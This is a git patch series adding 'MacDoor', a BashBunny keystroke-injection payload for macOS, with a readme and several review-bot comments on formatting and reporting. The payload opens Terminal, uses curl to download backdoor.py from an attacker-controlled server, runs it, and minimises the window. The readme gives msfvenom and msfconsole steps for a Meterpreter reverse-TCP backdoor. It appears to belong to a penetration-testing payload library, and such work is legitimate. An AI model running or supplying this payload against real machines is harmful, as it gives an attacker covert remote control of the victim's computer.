From abf2de5d6e8f42130febf0a7519e6234a21da4b9 Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Wed, 30 Aug 2023 13:06:16 +0200 Subject: [PATCH 1/2] Add files via upload --- .../library/execution/MacDoor/payload.txt | 47 +++++++++++++++++++ payloads/library/execution/MacDoor/readme.md | 30 ++++++++++++ 2 files changed, 77 insertions(+) create mode 100644 payloads/library/execution/MacDoor/payload.txt create mode 100644 payloads/library/execution/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt new file mode 100644 index 000000000..4c5038fc4 --- /dev/null +++ b/payloads/library/execution/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Execution +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH 
diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md new file mode 100644 index 000000000..0331dc117 --- /dev/null +++ b/payloads/library/execution/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for the BashBunny + + + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ + + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Execution + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + From 08b582eba25440fe2186a65ae738c2fc0f084f65 Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Wed, 30 Aug 2023 14:42:49 +0200 Subject: [PATCH 2/2] Update readme.md --- payloads/library/execution/MacDoor/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md index 0331dc117..5e82e9ccd 100644 --- a/payloads/library/execution/MacDoor/readme.md +++ b/payloads/library/execution/MacDoor/readme.md @@ -1,12 +1,12 @@ # MacDoor - Python Backdoor Execution for the BashBunny - +``` __ ___ ____ / |/ /____ _ _____ / __ \ ____ ____ _____ / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ / / / // /_/ // /__ / /_/ // /_/ // /_/ // / /_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ - +``` * Author: afsh4ck * Version: 1.0
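Review bot: In payload.txt, the `QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py` line hard-codes one lab address, while the header Note says the address and port have to be changed before use. Define the host and port once at the top of the script, next to that Note, and reference them in the string, in the same spirit as the `{your IP}` placeholder in Step 1. The header should also list what a run leaves on the test machine, as these lines show it: a plain-HTTP request to port 8000, the file `Downloads/backdoor.py`, and a `python3` process started from Terminal, so the engagement report and the defending team know which artifacts to look for.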
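Review bot: In the new readme.md (PATCH 1/2), the NOTE section says "modify the script with your attacker IP and the port or your local server" without naming the line to edit, and "port or" reads like a typo for "port of". Point the reader at the `curl` line in payload.txt and fix the wording. The LED status list (Purple, Yellow blink, Green) exists only in the payload.txt header and `Tested on: Ventura 13.3.1` only in the readme; carry each into the other file so the two descriptions agree.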
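Review bot: In PATCH 2/2, both blank lines around the ASCII banner in readme.md are replaced by the fence markers, so the closing fence now sits directly above `* Author: afsh4ck` and the opening fence directly below the `# MacDoor` heading. Keep a blank line before the opening fence and after the closing one so the heading, code block and bullet list stay separate across Markdown renderers. The subject "Update readme.md" also says nothing about the change; something like "Wrap ASCII banner in code fence" would make the history readable.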